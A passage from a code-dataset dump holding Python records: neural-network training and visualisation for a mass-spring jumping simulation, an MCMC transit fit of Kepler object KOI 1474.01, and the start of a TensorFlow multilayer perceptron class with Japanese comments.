+= 1.\n s = np.linalg.norm(vecs, axis=1)\n self.nodesColor[:, 0] = h\n self.nodesColor[:, 1] = s\n self.nodesColor[:, 2] = s\n # self.nodesColor[:, 3] = 1.\n\n def setActFunc(self, actFunc):\n self.actFunc = actFunc\n\n def setActFuncToSigmoid(self):\n self.actFunc = 1\n\n def setActFuncToRelu(self):\n self.actFunc = 2\n\n def setDimX(self, dim):\n self.dimX = dim\n self.weight = np.random.random((self.dimY, self.dimX))\n\n def setDimY(self, dim):\n self.dimY = dim\n self.weight = np.random.random((self.dimY, self.dimX))\n self.bias = np.random.random((self.dimY, 1))\n\n def cal_output(self, x):\n self.x = x\n if self.actFunc == 1: # Sigmoid activation function\n self.y = self.cal_outputSigmoid(self.x)\n elif self.actFunc == 2: # Relu actiation function\n self.y = self.cal_outputRelu(self.x)\n return self.y\n\n def cal_outputSigmoid(self, x):\n z = np.dot(self.weight, x) + self.bias\n return sigmoid(z)\n\n def cal_outputRelu(self, x):\n return relu(np.dot(self.weight, x) + self.bias)\n\n def backpropagation(self, djy, alpha):\n n = self.djy.shape[1]\n self.djy = djy\n if self.actFunc == 1: # Sigmoid activation function\n self.djz = self.djy * dsigmoid(self.y)\n elif self.actFunc == 2: # Relu activation function\n self.djz = self.djy * drelu(self.y)\n self.djw = np.dot(self.djz, self.x.T) / n\n self.djb = (np.sum(self.djz, 1) / n).reshape((self.dimY, 1))\n self.djx = np.dot(self.weight.T, self.djz)\n\n self.weight -= alpha * self.djw\n self.bias -= alpha * self.djb\n return self.djx\n\n def set_edge_input(self, x):\n for i in range(self.dimY):\n for j in range(self.dimX):\n self.edges[i, j].setInputSignal(x[j])\n\n def get_output(self):\n return self.y\n\n def init_graph(self, x=0., y=0., r=.2, camera=None):\n b = 6. * r\n d = 3. * r\n offsetX = .5 * b\n offsetYNode = .5*(self.dimY-1)*d\n offsetYedge = .5*(self.dimX-1)*d\n self.map2nodesColor(self.bias)\n for i in range(self.dimY):\n self.nodes[i] = Circle(x=x+offsetX, y=y+d*i-offsetYNode, radius=r,\n h=self.nodesColor[i, 0], s=self.nodesColor[i, 1], v=self.nodesColor[i, 2],\n alpha=self.nodesColor[i, 3], camera=camera)\n for j in range(self.dimX):\n colorEdge = map2color(self.weight[i, j])\n self.edges[i, j] = Curve(x0=x-b+offsetX, y0=y+j*d-offsetYedge, x1=x+offsetX, y1=y+d*i-offsetYNode,\n offset0=r, offset1=r,\n h=colorEdge[0], s=colorEdge[1], v=colorEdge[2],\n alpha=colorEdge[3], camera=camera)\n def draw(self):\n x = np.zeros((self.dimX, 1))\n for j in range(self.dimX):\n x[j, 0] = self.edges[0, j].get_outputSignal()\n y = self.cal_output(x)\n self.map2nodesColor(y)\n for i in range(self.dimY):\n self.nodes[i].setColor(self.nodesColor[i, :])\n self.nodes[i].draw()\n for j in range(self.dimX):\n self.edges[i, j].draw()\n\n\n# Neural networks class\n# dimIn: dimension of input\n# dimOut: dimension of output\n# ls: number of neures in every hidden layer\nclass NeuralNet:\n def __init__(self, dimIn=2, dimOut=3, ls=np.array([3, 3, 3]), camera=None):\n self.ls = ls\n self.numLs = len(ls) + 1 # Layers count\n self.layers = []\n self.dimIn = dimIn\n self.dimOut = dimOut\n dimx = dimIn\n for i in range(self.numLs - 1):\n dimy = ls[i]\n l = Layer(dimx, dimy, actFunc=2)\n dimx = dimy\n self.layers.append(l)\n l = Layer(dimx, dimOut, actFunc=2)\n self.layers.append(l)\n\n # Training information\n self.yest = [] # Estimation of output\n self.err = [] # Error between estimation and output data\n self.j = 0 # Cost function output\n self.js = [] # All cost in training loop\n\n # Graph\n self.camera = camera\n self.inputNode = np.zeros(self.dimIn, 
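# Editorial sketch, not in the original file: a simplified, standalone version
# of the per-layer gradient step that Layer.backpropagation() above is built
# around (sigmoid branch), with x of shape (dimX, n), y = sigmoid(W x + b) of
# shape (dimY, n), and averaging over an assumed batch size n. The name
# layer_backward is hypothetical and used only for this illustration.
import numpy as np

def layer_backward(weight, x, y, djy):
    n = x.shape[1]
    djz = djy * y * (1.0 - y)                   # dsigmoid(y) = y * (1 - y)
    djw = djz @ x.T / n                         # gradient w.r.t. the weights
    djb = djz.sum(axis=1, keepdims=True) / n    # gradient w.r.t. the bias
    djx = weight.T @ djz                        # gradient for the previous layer
    return djw, djb, djx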
dtype=Circle)\n self.edgeInput = np.zeros(self.dimIn)\n self.init_graph()\n\n def random_init_parameters(self):\n for l in self.layers:\n l.random_init_parameters()\n\n def save_network_structure(self, name='neural_network'):\n ls = self.ls\n num_ls = self.numLs\n dim_in = self.dimIn\n dim_out = self.dimOut\n layers_parameters = []\n for l in self.layers:\n layers_parameters.append(l.get_parameter())\n np.savez(name, ls=ls, num_ls=num_ls, dim_in=dim_in, dim_out=dim_out,\n layers_parameters=layers_parameters)\n\n def construct_from_file(self, name='neural_network.npz'):\n params = np.load(name, allow_pickle=True)\n self.ls = params['ls']\n self.numLs = len(self.ls)+1\n self.layers = []\n self.dimIn = params['dim_in']\n self.dimOut = params['dim_out']\n layers_parameters = params['layers_parameters']\n\n\n dimx = self.dimIn\n for i in range(self.numLs -1):\n dimy = self.ls[i]\n l = Layer(dimx, dimy)\n l.set_parameter(layers_parameters[i])\n dimx = dimy\n self.layers.append(l)\n l = Layer(dimx, self.dimOut)\n l.set_parameter(layers_parameters[-1])\n self.layers.append(l)\n print('Neural Network:')\n print('dim in: '+str(self.dimIn) + '\\t dim out: ' + str(self.dimOut))\n print('layers: ' + str(self.ls))\n\n self.init_graph()\n\n\n def init_graph(self, x=0., y=0., r=.2):\n b = 6. * r\n d = 3. * r\n offsetX = .5 * (self.numLs-1) * b\n offsetInputNodeY = .5*(self.dimIn-1) * d\n\n\n self.inputNode = np.zeros(self.dimIn, dtype=Circle)\n for i in range(self.dimIn):\n self.inputNode[i] = Circle(x=x-.5*b-offsetX, y=y+i*d-offsetInputNodeY, radius=r,\n s=0., v=.5, camera=self.camera)\n for i in range(self.numLs):\n self.layers[i].init_graph(x=x+b*i-offsetX, y=y, r=r, camera=self.camera)\n self.edgeInput = np.zeros(self.dimIn)\n\n\n def cal_output(self, input):\n x = input\n for i in range(self.numLs):\n x = self.layers[i].cal_output(x)\n # print('weight '+str(i))\n # print(self.layers[i].weight)\n # print('out:'+str(np.shape(x)))\n # print(x)\n return x\n # for l in self.layers:\n # x = l.cal_output(x)\n # return x\n\n def cal_output_grid(self, x):\n s = x.shape\n xv = x.reshape((-1, 2)).T\n y = self.cal_output(xv)\n y = y.reshape((s[0], s[1]))\n return y\n\n def backpropagation(self, djy, alpha):\n djx = djy\n for i in range(self.numLs):\n djx = self.layers[-i - 1].backpropagation(djx, alpha)\n\n def training(self, xdata, ydata, iteration=500, alpha=0.1, detect_vg=True, dynamic_step=False):\n print('training...')\n alpha_max = .6\n alpha_min = 0.001\n alpha_min0 = alpha_min\n alpha_max0 = alpha_max\n lock_max = False\n nvb_num = 10\n vibrate = 0\n notvibrate = 0\n alpha = alpha\n alpha0 = alpha\n data_num = xdata.shape[1]\n i = 0\n t0 = time.time()\n print('t:'+str(t0))\n while i < iteration:\n t_i = time.time()-t0\n left_num = iteration-i\n left_time = int(t_i*float(left_num)/float(i+1))\n left_sec = left_time%60\n left_min = int(left_time/60)\n left_hos = int(left_min/60)\n left_min = left_min%60\n # print(xdata)\n self.yest = self.cal_output(xdata)\n self.err = self.yest - ydata\n self.j = np.sum(self.err ** 2.)\n jj = self.j/data_num\n self.js.append(self.j)\n self.backpropagation(self.err, alpha)\n j_last = 0\n if i > 5:\n j_last = self.j - (self.js[i-4]-self.j)/4*left_num\n print('iter: ' + str(i) + '/'+str(iteration)+'\\tcost: '\\\n +str(round(float(self.j), 5)) + '\\tcost/n: '+str(round(float(jj),8))\\\n +'\\talpha: '+str(round(alpha,5))\\\n +'\\tremain: '+str(left_hos)+'h'+str(left_min)+'m'+str(left_sec)+'s')\n print('\\tcost end: '+str(round(j_last,3))+'\\tcost/n end: 
'+str(round(j_last/data_num, 8))\\\n +'\\talpha max: '+str(round(alpha_max,5)) + '\\talpha min: '+str(round(alpha_min,5)))\n # Detect vanishing gradient\n if detect_vg and self.j > 50 and i > 5 and abs(self.js[i-4] - self.js[i-1]) < 0.0001 and alpha == alpha_max or self.j > 8000:# or self.j != self.j:\n self.js = []\n self.random_init_parameters()\n i = 0\n alpha = alpha0\n vibrate = False\n alpha_max = alpha_max0\n alpha_min = alpha_min0\n print(self.js)\n print('restart...')\n # Dynamic change step size\n if dynamic_step and i > 15:\n # print('alpha max: '+str(round(alpha_max,5)) + '\\talpha min: '+str(round(alpha_min,5)))\n if self.js[i - 2] < self.js[i - 1]:\n vibrate += 1\n notvibrate = 0\n\n else:\n notvibrate += 1\n if notvibrate >= nvb_num:\n lock_max = False\n notvibrate = nvb_num\n vibrate = 0\n if notvibrate == nvb_num:\n if self.j > 1000 and self.js[i-2] - self.js[i-1] < 10.:\n alpha += 0.01\n if self.j <= 1000 and self.js[i-2] - self.js[i-1] < .1:\n alpha += 0.001\n alpha = min(alpha, alpha_max)\n elif self.j < 100 and self.js[i-4] - self.js[i-1] > 50. or vibrate:\n if not lock_max:\n alpha_max = alpha\n lock_max = True\n alpha_min = alpha_max * .5\n alpha -= 0.004\n alpha = max(alpha_min, alpha)\n\n\n i += 1\n\n def setInput(self, x):\n self.edgeInput = x\n\n def draw(self):\n for i in range(self.dimIn):\n self.inputNode[i].setColorV(self.edgeInput[i])\n self.inputNode[i].draw()\n x = self.edgeInput\n for l in range(self.numLs):\n self.layers[l].set_edge_input(x)\n self.layers[l].draw()\n x = self.layers[l].get_output()\n\n\n# TEST\n# Neural network test\ndef test_neural():\n camera = Camera(scale=100)\n camera.setY(0.0)\n nn = NeuralNet(dimIn=2, dimOut=2, ls=np.array([2, 2, 5]), camera=camera)\n nn.construct_from_file('mass_spring_neural_network.npz')\n # nn.save_network_structure()\n t = [0]\n @window.event\n def on_draw():\n gl.glClear(gl.GL_COLOR_BUFFER_BIT)\n gl.glLoadIdentity()\n\n nn.draw()\n\n def update(dt, t):\n t[0] += dt\n w = 1.\n s = .5*np.sin(2.*np.pi*w*t[0])+.5\n c = .5*np.cos(2.*np.pi*w*t[0])+.5\n nn.setInput(np.array([s, c, s, c, s, c]).reshape(-1, 1))\n print(nn.cal_output(np.array([s, c, s, c, s, c]).reshape(-1, 1)))\n pyglet.clock.schedule_interval(update, t=t, interval=1.0 / 100.0)\n pyglet.app.run()\n# test_neural()\n\n# Sampling Learning data\n# learning data: shape:(6,num)\n# [vx_last, vy_last, y_last, vx_this, vy_this, y_this, angle_hit]'\ndef mass_spring_sampling_data(num=10, fast_mode = False):\n def randomInit(vx_mean=0., vx_range=5., vy_mean=0., vy_range=5.,\n y_mean=3., y_range=2., rad_mean=-np.pi*.5, rad_range=-np.pi/3.):\n y = y_mean + 2. * (np.random.random() - .5) * y_range\n vx = vx_mean + 2. * (np.random.random() - .5) * vx_range\n vy = vy_mean + 2. * (np.random.random() - .5) * vy_range\n rad = rad_mean + 2. 
* (np.random.random() - .5) * rad_range\n return vx,vy,y,rad\n\n camera = Camera(scale=90)\n camera.setY(1.5)\n jumper = MassSpring(camera=camera)\n g = Ground(l=100,camera=camera)\n num = num\n vx,vy,y,rad = randomInit()\n jumper.init(0, y, rad, vx, vy)\n sample = [vx, vy, y, 0, 0, 0, rad]\n data = np.zeros((7, num))\n state = [0, 0] # state[0]: last state; state[1] = this state\n i = [0]\n\n @window.event\n def on_draw():\n gl.glClear(gl.GL_COLOR_BUFFER_BIT)\n gl.glLoadIdentity()\n jumper.draw()\n g.draw()\n\n def update(dt, sample, data, state, i, num):\n jumper.update(dt=0.01, control=False)\n # camera.setX(jumper.x)\n state[0] = state[1]\n state[1] = jumper.state\n if state[0] == 1 and state[1] != state[0] and i[0] < num:\n sample[3:-1] = [jumper.vx, jumper.vy, jumper.y]\n data[:, i[0]] = sample\n sample_display = [round(v, 3) for v in sample]\n print('sample '+str(i[0]+1)+'\\tvx0,vy0,y0,vx1,vy1,y1,rad: '+str(sample_display))\n i[0] += 1\n if i[0] == num:\n name = 'mass_spring_learning_data_'+str(int(num/1000))+'_k'\n np.save(name, data)\n print('sample ok')\n vx, vy, y, rad = randomInit()\n jumper.init(0, y, rad, vx, vy)\n sample[:] = [vx, vy, y, 0, 0, 0, rad]\n state[:] = [0,0]\n elif state[1] == 2:\n vx, vy, y, rad = randomInit()\n jumper.init(0, y, rad, vx, vy)\n sample[:] = [vx, vy, y, 0, 0, 0, rad]\n state[:] = [0, 0]\n\n if fast_mode:\n while(i[0] <= num):\n update(dt=0.01, sample=sample, data=data, state=state, i=i, num=num)\n\n\n else:\n pyglet.clock.schedule_interval(update,interval=1./100.,\n sample=sample, data=data, state=state, i=i, num=num)\n pyglet.app.run()\n# mass_spring_sampling_data(50000, fast_mode=True)\n\n# Mass spring 5 input neural network\ndef mass_spring_learning_5_input():\n def normalize_data(input_data, output_data, vx_range=10., vy_range=10., y_min=.2, y_max=5.,\n rad_min=-np.pi*5./6., rad_max=-np.pi/6.):\n input_data[0, :] = remap(input_data[0, :], -vx_range, vx_range)\n input_data[1, :] = remap(input_data[1, :], -vy_range, vy_range)\n input_data[2, :] = remap(input_data[2, :], y_min, y_max)\n input_data[3, :] = remap(input_data[3, :], -vx_range, vx_range)\n output_data[:] = remap(output_data[:], rad_min, rad_max)\n data = np.load('mass_spring_learning_data_100k.npy')\n data = np.array(data)\n # Save to excel\n # data_pd = pd.DataFrame(data.T, columns=['vx0', 'vy0', 'y0', 'vx1', 'vy1', 'y1', 'rad'])\n # data_pd.to_excel('mass_spring_learning_data_100k.xlsx')\n vy1 = data[4, :]\n vy1[vy1 > 3] = 2.\n vy1[(vy1 <= 3.) * (vy1 >= 0.5)] = 1.\n vy1[vy1 < 0.5] = 0.\n input_data = np.vstack([data[:4, :], vy1])\n output_data = data[-1, :]\n\n learning_num = 40000\n input_data = input_data[:, :learning_num]\n output_data = output_data[:learning_num]\n normalize_data(input_data, output_data)\n\n nn = NeuralNet(dimIn=5, dimOut=1, ls=15*np.ones(1, dtype=int))\n # nn.save_network_structure('mass_spring_nn_5_inputs_20_layers_30k_samples_1st_loop')\n nn.construct_from_file('mass_spring_nn_5_inputs_20_layers_10k_samples.npz')\n nn.training(input_data, output_data, iteration=8000, alpha=0.1, detect_vg=True)\n nn.save_network_structure(name='mass_spring_nn_5_inputs_20_layers_10k_samples')\n# mass_spring_learning_5_input()\n\n# Mass spring 4 input neural network\n# input: [vx0, y0, vx1, y1]; output:[rad]\ndef mass_spring_learning_4_input():\n def normalize_data(input_data, output_data, vx_range=10., vy_range=10., y_min=.2, y_max=5.,\n rad_min=-np.pi * 5. 
/ 6., rad_max=-np.pi / 6.):\n input_data[0, :] = remap(input_data[0, :], -vx_range, vx_range)\n input_data[1, :] = remap(input_data[1, :], y_min, y_max)\n input_data[2, :] = remap(input_data[2, :], -vx_range, vx_range)\n input_data[3, :] = remap(input_data[3, :], y_min, y_max)\n output_data[:] = remap(output_data[:], rad_min, rad_max)\n\n data = np.load('mass_spring_learning_data_50k.npy')\n data = np.array(data)\n vx0 = data[0, :]\n vy0 = data[1, :]\n y0 = data[2, :]\n vx1 = data[3, :]\n vy1 = data[4, :]\n y1 = data[5, :]\n y0_top = y0 + .5*vy0**2/gravity\n y1[vy1 > 0] += .5*vy1[vy1>0]**2/gravity\n y1[vy1 <= 0] = 0.2\n input_data = np.vstack([vx0, y0_top, vx1, y1])\n output_data = data[-1, :]\n\n learning_num = 50000\n input_data = input_data[:, :learning_num]\n output_data = output_data[:learning_num]\n normalize_data(input_data, output_data)\n\n nn = NeuralNet(dimIn=4, dimOut=1, ls=10*np.ones(5, dtype=int))\n # nn.save_network_structure('mass_spring_nn_4_input_1st_loop')\n # nn.construct_from_file('mass_spring_nn_4_input.npz')\n nn.training(input_data, output_data, iteration=30000, alpha=0.1, detect_vg=True)\n nn.save_network_structure(name='mass_spring_nn_4_input_1')\n# mass_spring_learning_4_input()\n\n# Mass spring 4 input neural network\n# input: [vx0, y0, vx1, y1_fuzzy] output: [rad]\ndef mass_spring_learning_4_input_fuzzy():\n def normalize_data(input_data, output_data, vx_range=10., vy_range=10., y_min=.2, y_max=5.,\n rad_min=-np.pi * 5. / 6., rad_max=-np.pi / 6.):\n input_data[0, :] = remap(input_data[0, :], -vx_range, vx_range)\n input_data[1, :] = remap(input_data[1, :], y_min, y_max)\n input_data[2, :] = remap(input_data[2, :], -vx_range, vx_range)\n output_data[:] = remap(output_data[:], rad_min, rad_max)\n\n data = np.load('mass_spring_learning_data_50k.npy')\n data = np.array(data)\n vx0 = data[0, :]\n vy0 = data[1, :]\n y0 = data[2, :]\n vx1 = data[3, :]\n vy1 = data[4, :]\n y1 = data[5, :]\n y0_top = y0 + .5*vy0**2/gravity\n y1[vy1 > 0] = 1.\n y1[vy1 <= 0] = 0.\n input_data = np.vstack([vx0, y0_top, vx1, y1])\n output_data = data[-1, :]\n # np.save('mass_spring_learning_data_norm_50k.npy', np.vstack([input_data,output_data]))\n\n learning_num = 40000\n input_data = input_data[:, :learning_num]\n output_data = output_data[:learning_num]\n normalize_data(input_data, output_data)\n\n nn = NeuralNet(dimIn=4, dimOut=1, ls=10*np.ones(20, dtype=int))\n # nn.save_network_structure('mass_spring_nn_4_input_1st_loop')\n nn.construct_from_file('mass_spring_nn_4_input_fuzzy_deep_1.npz')\n nn.training(input_data, output_data, iteration=10000, alpha=0.0001, detect_vg=True, dynamic_step=True)\n nn.save_network_structure(name='mass_spring_nn_4_input_fuzzy_deep_2')\nmass_spring_learning_4_input_fuzzy()\n\n# Mass spring Learning from learning data\ndef mass_spring_learning_6_input():\n def normalize_data(input_data,output_data,vx_range=10., vy_range=10., y_min=.2, y_max=5., \n rad_min=-np.pi*5./6., rad_max=-np.pi/6.):\n input_data[0, :] = remap(input_data[0, :], -vx_range, vx_range)\n input_data[1, :] = remap(input_data[1, :], -vy_range, vy_range)\n input_data[2, :] = remap(input_data[2, :], y_min, y_max)\n input_data[3, :] = remap(input_data[3, :], -vx_range, vx_range)\n input_data[4, :] = remap(input_data[4, :], -vy_range, vy_range)\n input_data[5, :] = remap(input_data[5, :], y_min, y_max)\n output_data[:] = remap(output_data[:], rad_min, rad_max)\n\n data = np.load('mass_spring_learning_data_100k.npy')\n data = np.array(data)\n # d = pd.DataFrame(data.T, columns=['vx0', 'vy0', 'y0', 
'vx1', 'vy1', 'y1', 'rad'])\n # d.to_excel('mass_spring_learning_data.xls')\n learning_num = 20000\n input_data = data[:-1, :learning_num]\n output_data = data[-1, :learning_num]\n normalize_data(input_data, output_data)\n\n nn = NeuralNet(dimIn=6, dimOut=1, ls=10*np.ones(3, dtype=int))\n nn.construct_from_file('mass_spring_nn_5.npz')\n nn.training(input_data, output_data, iteration=4000, alpha=0.1, detect_vg=True)\n nn.save_network_structure(name='mass_spring_nn_5')\n# nn = mass_spring_learning_6_input()\n\n# Mass spring let's jump\ndef mass_spring_jump():\n camera = Camera(scale=80)\n camera.setY(1.5)\n ground = Ground(l=100, camera=camera)\n\n jumpers = []\n num = 2\n for i in range(num):\n j = MassSpring(y=3.5, camera=camera)\n j.set_jump_dst(vx_dst=0., y_dst=1.)\n j.head.setColorH(i/float(num))\n jumpers.append(j)\n jumpers[0].construct_neural_network_from_file('mass_spring_nn_4_input_fuzzy_2.npz')\n jumpers[1].construct_neural_network_from_file('mass_spring_nn_4_input_fuzzy_deep_1.npz')\n\n t = [0]\n @window.event\n def on_draw():\n gl.glClear(gl.GL_COLOR_BUFFER_BIT)\n gl.glLoadIdentity()\n\n ground.draw()\n for j in jumpers:\n j.draw()\n def update(dt, t):\n x = 0\n for j in range(len(jumpers)):\n if jumpers[j].x < 500:\n jumpers[j].set_jump_dst(vx_dst=0., y_dst=1.)\n else:\n jumpers[j].set_jump_dst(vx_dst=0., y_dst=1.)\n jumpers[j].update(dt=dt, control=True)\n print('jumper '+str(j)+'\\tx: '+str(round(jumpers[j].x,3))+'\\tvx: '+str(round(jumpers[j].vx,3)))\n x += jumpers[j].x\n x /= len(jumpers)\n camera.setX(jumpers[0].x)\n\n pyglet.clock.schedule_interval(update, t=t, interval=1/100)\n pyglet.app.run()\n# mass_spring_jump()\n\n\n\n\n","sub_path":"AboutAI.py","file_name":"AboutAI.py","file_ext":"py","file_size_in_byte":53221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"241250162","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import division, print_function, absolute_import\nimport sys\nimport emcee\nimport time as timer\nimport triangle\nimport matplotlib.pyplot as pl\nimport numpy as np\nimport scipy.optimize as op\n\nimport kplr\nfrom kplr.ld import get_quad_coeffs\n\nimport bart\nfrom bart.parameters import Parameter, LogParameter, ImpactParameter\nfrom bart.priors import UniformPrior\n\n# Get the KOI.\nclient = kplr.API()\nkoi = client.koi(\"1474.01\")\nperiod, t0, dt = koi.koi_period, koi.koi_time0bk, 2.0\nt0 = t0 % period\n\nnp.seterr(all=\"raise\")\n\n# Load the light curves.\nlcs = koi.get_light_curves(fetch=True)\ndatasets = []\nfor lc in lcs:\n with lc.open() as f:\n data = f[1].data\n longcadence = f[0].header.get(\"obsmode\") == \"long cadence\"\n\n if longcadence:\n datasets += bart.data.GPLightCurve(data[\"time\"], data[\"sap_flux\"],\n data[\"sap_flux_err\"],\n l2=1.0,\n period=period, t0=t0,\n dt=dt).autosplit()\n else:\n continue\n datasets += bart.data.LightCurve(data[\"time\"], data[\"sap_flux\"],\n data[\"sap_flux_err\"],\n period=period, t0=t0,\n texp=kplr.EXPOSURE_TIMES[0],\n dt=dt).autosplit()\n\n# Get the limb darkening profile.\nkic = koi.star\nteff, logg, feh = kic.kic_teff, kic.kic_logg, kic.kic_feh\nassert teff is not None\nmu1, mu2 = get_quad_coeffs(teff, logg=logg, feh=feh)\nbins = np.linspace(0, 1, 50)[1:] ** 0.5\nldp = bart.ld.QuadraticLimbDarkening(mu1, mu2, bins=bins)\n\n# Set up the star.\nstar = bart.Star(ldp=ldp)\n\n# Set up the planet.\na = star.get_semimajor(period)\nincl = np.degrees(np.arctan2(a, 0.883)) # This looks better than KOI.\nplanet = 
bart.Planet(0.069, a, t0=t0, ix=90.-incl) # Same.\n\n# Figure out the transit timing ranges.\nranges = [(np.min(d.time), np.max(d.time)) for d in datasets]\n\n# Set up the system/model.\nps = bart.VariationalSystem(ranges, star, var_t0=0.1, var_ix=0.1)\nps.add_planet(planet)\nmodel = bart.Model(ps)\n\n# Estimate the transit time offsets.\nttparams = []\nfor d in datasets:\n deltat = d.estimate_deltat(model, period, t0, 0.15)\n if deltat is not None:\n ps.delta_t0[0] = deltat\n ttparams.append(Parameter(ps, \"delta_t0\"))\n ttparams.append(Parameter(ps, \"delta_ix\"))\n model.datasets.append(d)\n\nphys_pars = [\n Parameter(star.ldp, \"gamma1\", lnprior=UniformPrior(0, 1)),\n Parameter(star.ldp, \"gamma2\", lnprior=UniformPrior(0, 1)),\n LogParameter(star, \"mass\"),\n Parameter(planet, \"r\", lnprior=UniformPrior(0, 1)),\n ImpactParameter(planet),\n LogParameter(planet, \"a\")\n]\nphys_bounds = [(0, 1), (0, 1), (None, None), (0, 1), (0, 1), (None, None)]\n\nhyper_pars = [\n LogParameter([d for d in model.datasets\n if hasattr(d, \"alpha\")], \"alpha\"),\n LogParameter([d for d in model.datasets\n if hasattr(d, \"l2\")], \"l2\")\n]\nhyper_bounds = [(None, None) for p in hyper_pars]\n\ntime_pars = [Parameter(planet, \"t0\"), LogParameter(ps, \"var_t0\"),\n LogParameter(ps, \"var_ix\")] + ttparams\ntime_bounds = [(None, None) for p in time_pars]\n\nif \"--restart\" not in sys.argv:\n def chi2(p):\n lnp = model(p)\n return -2*lnp\n\n for pars, bounds in zip([time_pars, phys_pars],\n [time_bounds, phys_bounds]):\n model.parameters = pars\n result = op.minimize(chi2, model.vector, method=\"L-BFGS-B\",\n bounds=bounds)\n model.vector = result[\"x\"]\n\nmodel.parameters = phys_pars + hyper_pars + time_pars\nprint(model.lnprob())\n\nimport cPickle as pickle\npickle.dump(model, open(\"model.pkl\", \"w\"), -1)\n\n# Plot initial predictions.\noffset = 3e-3\nfor i, d in enumerate(model.datasets):\n pl.plot(d.time % period, d.flux + offset * i, \".\")\n pl.plot(d.time % period, d.predict(model) + offset * i, \"k\")\npl.xlim(t0 - dt, t0 + dt)\npl.savefig(\"initial.png\")\n\n# Start sampling.\nfn = \"samples.txt\"\nv = model.vector\ntruth = np.array(v)\n\nif \"--results\" not in sys.argv:\n # Set up sampler.\n nwalkers = 64\n\n if \"--restart\" in sys.argv:\n samples = np.loadtxt(fn)\n p0 = samples[-nwalkers:, :-1]\n else:\n p0 = v[None, :] + (1e-5 * np.random.randn(len(v) * nwalkers)).reshape(\n (nwalkers, len(v)))\n\n sampler = emcee.EnsembleSampler(nwalkers, len(p0[0]), model,\n threads=nwalkers)\n\n # Run a burn-in.\n print(\"Burning in\")\n pos, lnprob, state = sampler.run_mcmc(p0, 10, storechain=False)\n sampler.reset()\n\n print(\"Sampling\")\n with open(fn, \"w\") as f:\n f.write(\"# {0}\\n\".format(\" \".join(map(unicode, model.parameters))))\n\n strt = timer.time()\n for pos, lnprob, state in sampler.sample(pos, lnprob0=lnprob,\n iterations=5000,\n storechain=False):\n with open(fn, \"a\") as f:\n for p, lp in zip(pos, lnprob):\n f.write(\"{0} {1}\\n\".format(\n \" \".join(map(\"{0}\".format, p)), lp))\n\n print(\"Took {0} seconds\".format(timer.time() - strt))\n print(\"Acceptance fraction: {0}\"\n .format(np.mean(sampler.acceptance_fraction)))\n\nsamples = np.loadtxt(fn)\nfigure = triangle.corner(np.concatenate([samples,\n np.atleast_2d(\n np.arange(len(samples))).T],\n axis=1),\n labels=map(unicode, model.parameters) + [\"lnp\", \"t\"],\n )\nfigure.savefig(\"triangle.png\")\n\n# Plot predictions.\npl.figure(figsize=(5, 10))\nfor i, d in enumerate(model.datasets):\n t = (d.time - t0 + 0.5 * 
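# Editorial note, not part of the original script: the phase-folding
# expression used in the prediction plots here,
#     t = (d.time - t0 + 0.5 * period) % period - 0.5 * period,
# maps every timestamp into a single orbit centred on the transit epoch t0,
# i.e. into the interval [-period/2, period/2). A tiny standalone example
# with made-up numbers:
import numpy as np

time = np.array([0.3, 5.3, 10.3, 14.9])
period, t0 = 5.0, 0.3
folded = (time - t0 + 0.5 * period) % period - 0.5 * period
# -> approximately [0.0, 0.0, 0.0, -0.4]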
period) % period - 0.5 * period\n pl.plot(t, d.flux + offset * i, \".\")\n\ninds = np.random.randint(len(samples), size=24)\nfor sample in samples[inds]:\n model.vector = sample[:-1]\n for i, d in enumerate(model.datasets):\n t = (d.time - t0 + 0.5 * period) % period - 0.5 * period\n pl.plot(t, d.predict(model) + i * offset, \"k\", alpha=0.2)\n\npl.xlabel(\"time from transit [days]\")\npl.savefig(\"prediction.png\")\n\n# Plot limb darkening.\npl.figure()\nr = np.linspace(0, 1, 500)\nfor sample in samples[inds]:\n model.vector = sample[:-1]\n pl.plot(r, star.ldp(r) / star.ldp.norm, \"k\", alpha=0.2)\npl.savefig(\"ldp.png\")\n","sub_path":"examples/koi1474/koi1474.py","file_name":"koi1474.py","file_ext":"py","file_size_in_byte":6578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"528514672","text":"# -*- coding:utf-8 -*-\r\n# Anaconda 4.3.0 環境 (TensorFlow インストール済み)\r\n\r\n\"\"\"\r\n 更新情報\r\n [17/10/14] : 新規作成\r\n [17/11/19] : NeuralNetwrksBase クラスの子クラスになるように変更\r\n : \r\n\"\"\"\r\nimport numpy\r\n\r\n# TensorFlow ライブラリ\r\nimport tensorflow as tf\r\nfrom tensorflow.python.framework import ops\r\n\r\n# scikit-learn ライブラリ\r\nfrom sklearn.utils import shuffle\r\n\r\n# 自作クラス\r\nfrom NeuralNetworkBase import NeuralNetworkBase # 親クラス\r\n\r\nimport NNActivation\r\nfrom NNActivation import NNActivation # ニューラルネットワークの活性化関数を表すクラス\r\nfrom NNActivation import Sigmoid\r\nfrom NNActivation import Relu\r\nfrom NNActivation import Softmax\r\n\r\nimport NNLoss # ニューラルネットワークの損失関数を表すクラス\r\nfrom NNLoss import L1Norm\r\nfrom NNLoss import L2Norm\r\nfrom NNLoss import BinaryCrossEntropy\r\nfrom NNLoss import CrossEntropy\r\nfrom NNLoss import SoftmaxCrossEntropy\r\nfrom NNLoss import SparseSoftmaxCrossEntropy\r\n\r\nimport NNOptimizer # ニューラルネットワークの最適化アルゴリズム Optimizer を表すクラス\r\nfrom NNOptimizer import GradientDecent\r\nfrom NNOptimizer import Momentum\r\nfrom NNOptimizer import NesterovMomentum\r\nfrom NNOptimizer import Adagrad\r\nfrom NNOptimizer import Adadelta\r\n\r\n\r\nclass MultilayerPerceptron( NeuralNetworkBase ):\r\n \"\"\"\r\n 多層パーセプトロンを表すクラス\r\n TensorFlow での多層パーセプトロンの処理をクラス(任意の層に DNN 化可能な柔軟なクラス)でラッピングし、\r\n scikit-learn ライブラリの classifier, estimator とインターフェイスを共通化することで、\r\n scikit-learn ライブラリとの互換性のある自作クラス\r\n ----------------------------------------------------------------------------------------------------\r\n [public] public アクセス可能なインスタスンス変数には, 便宜上変数名の最後にアンダースコア _ を付ける.\r\n _n_inputLayer : int\r\n 入力層のノード数\r\n _n_hiddenLayers : shape = [h1,h2,h3,...] 
